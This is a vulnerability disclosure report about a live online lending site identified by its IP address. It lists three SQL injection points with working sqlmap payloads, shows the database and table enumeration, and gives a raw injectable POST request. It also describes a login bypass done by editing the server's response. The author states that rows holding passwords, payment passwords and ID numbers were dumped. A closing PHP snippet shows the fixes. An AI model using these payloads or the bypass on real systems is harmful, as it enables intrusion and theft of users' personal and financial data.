2016-03-21: Actively contacting the vendor and waiting for it to claim the report; details not disclosed.
2016-05-05: The vendor has chosen to ignore the vulnerability; details are now public.
With this many vulnerabilities, aren't you worried about your data being stolen?
http://180.97.80.205/
#1 Injection point 1: the id parameter
http://180.97.80.205/appaction/bao_detail.php?id=51&time=0.9278282364830375
When running sqlmap, drop the time parameter, otherwise it throws an error.
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=51 AND 5254=5254

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=51 AND (SELECT * FROM (SELECT(SLEEP(5)))qvnE)

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: id=-8819 UNION ALL SELECT NULL,CONCAT(0x7178717871,0x68486753634d4558417247794c514e56784d5456716e53596450564441425746676f72724b4c5a69,0x717a6a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web application technology: PHP 5.4.41
back-end DBMS: MySQL 5.0.12
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sq_phpcms
[*] sq_shangyu
[*] sq_yindian
The main data lives in the last three databases.
Database: sq_yindian
+-----------------------+---------+
| Table                 | Entries |
+-----------------------+---------+
| dw_account_log        | 29623   |
| dw_user_sendemail_log | 21667   |
| dw_message            | 15222   |
| dw_account_recharge   | 9664    |
| dw_borrow_collection  | 7980    |
| dw_friends            | 7723    |
| dw_user_log           | 7599    |
| dw_credit_log         | 6407    |
| sendlog               | 4240    |
| dw_user_amount        | 4143    |
| dw_user_cache         | 4132    |
| dw_user               | 4120    |
| dw_borrow_tender_log  | 3896    |
| dw_area               | 3579    |
| dw_borrow_tender      | 3460    |
| dw_prize_order        | 2584    |
| dw_account_cash       | 1514    |
| dw_credit             | 1424    |
| dw_account            | 947     |
| dw_userinfo           | 813     |
| dw_article            | 778     |
| dw_account_bank       | 752     |
| dw_article_fields     | 717     |
| dw_linkage            | 521     |
| dw_user_amountlog     | 485     |
| dw_borrow_repayment   | 420     |
| dw_cache              | 414     |
| dw_cityinfo           | 380     |
| dw_userlog_recharge   | 376     |
| dw_upfiles            | 368     |
| dw_everyday           | 285     |
| dw_user_backup        | 253     |
| dw_borrow             | 228     |
| dw_daizi              | 162     |
| dw_user_trend         | 136     |
| dw_user_amountapply   | 106     |
| dw_system             | 88      |
| dw_site               | 86      |
| dw_linkage_type       | 42      |
| dw_attestation_type   | 40      |
| dw_remind             | 28      |
| dw_bbs_posts          | 26      |
| dw_attestation        | 24      |
| dw_module             | 23      |
| dw_gongan_jk          | 18      |
| dw_links              | 16      |
| dw_user_type          | 16      |
| dw_bbs_topics         | 14      |
| dw_credit_type        | 14      |
| dw_scrollpic          | 12      |
| dw_bbs_forums         | 10      |
| dw_borrow_auto        | 9       |
| dw_bbs_credits        | 8       |
| dw_credit_rank        | 6       |
| dw_invite_type        | 5       |
| dw_online             | 5       |
| dw_prize              | 5       |
| dw_liuyan_set         | 4       |
| dw_report_users       | 4       |
| dw_flag               | 3       |
| dw_friends_request    | 3       |
| dw_remind_type        | 3       |
| dw_report_roles       | 3       |
| dw_scrollpic_type     | 3       |
| dw_links_type         | 2       |
| dw_log                | 2       |
| dw_payment            | 2       |
| dw_ad                 | 1       |
| dw_bbs_settings       | 1       |
| dw_borrow_editlog     | 1       |
| dw_editor             | 1       |
| dw_fields             | 1       |
+-----------------------+---------+
For demonstration only, three rows were dumped; they contain login passwords, payment passwords, ID card numbers, e-mail addresses and other data.
Payment passwords are exposed.
#2 Another SQL injection, in the mobile "shake" (yaoyiyao) screen; time-based blind injection.
http://180.97.80.205/appaction/yaoyiyao.php?uid=1
#The third SQL injection
POST http://180.97.80.205/appaction/phone_action.php HTTP/1.1
Host: 180.97.80.205
Connection: keep-alive
Content-Length: 15
Accept: */*
Origin: file://
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L720T Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,en-US;q=0.8

data=null%5D%5B*
#3 Logic flaw in the mobile login screen. It could not be more bare-bones: no CAPTCHA, credentials sent in plaintext, so brute-forcing it is only a matter of time. Intercept the response during login and change the response body to 1.
Hundreds of referral records.
Fix: verify the login state on the server side. Multiple parameters across the site are injectable; have a specialist audit the whole site properly.
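An added example of what those two fixes look like in PHP, written for this report and not taken from the vendor's code: the id parameter is validated and bound through a prepared statement instead of being concatenated into SQL, and the login state is held in a server-side session rather than trusted from the response body. The table dw_borrow comes from the dump above; its columns, the DSN and the credentials are assumptions.

```php
<?php
// Added example, not the vendor's code. Column names, DSN and credentials are
// assumptions; the table name dw_borrow appears in the sq_yindian dump.
declare(strict_types=1);

// Validate id strictly before it reaches SQL. The report shows id=51 being
// turned into boolean-, time- and UNION-based injections; a non-integer or
// non-positive value never gets as far as the query.
function parseId(string $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

function fetchBaoDetail(PDO $db, string $rawId): ?array
{
    $id = parseId($rawId);
    if ($id === null) {
        return null;
    }
    // Prepared statement: the value is bound, never spliced into the SQL text,
    // so "51 AND SLEEP(5)" or "-8819 UNION ALL SELECT ..." cannot alter the query.
    $stmt = $db->prepare('SELECT id, title, amount FROM dw_borrow WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// The mobile login flaw: the client trusts a "1" in the response body. The
// server must keep the login state itself and check it on every request,
// so editing a response on the client changes nothing the server believes.
function requireLogin(): int
{
    session_start();
    if (empty($_SESSION['uid'])) {
        http_response_code(401);
        echo json_encode(['status' => 0]);
        exit;
    }
    return (int) $_SESSION['uid'];
}

$db = new PDO('mysql:host=127.0.0.1;dbname=sq_yindian;charset=utf8mb4', 'app', 'secret', [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // use real server-side prepares
]);
requireLogin();
$detail = fetchBaoDetail($db, $_GET['id'] ?? '');
header('Content-Type: application/json');
echo json_encode($detail ?? ['status' => 0]);
```

The same parseId/bindValue pattern applies to the uid parameter of yaoyiyao.php and the data field of phone_action.php, which the report shows are injectable in the same way.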
Could not reach the vendor, or the vendor actively declined to respond.
Vulnerability Rank: 15 (WooYun rating)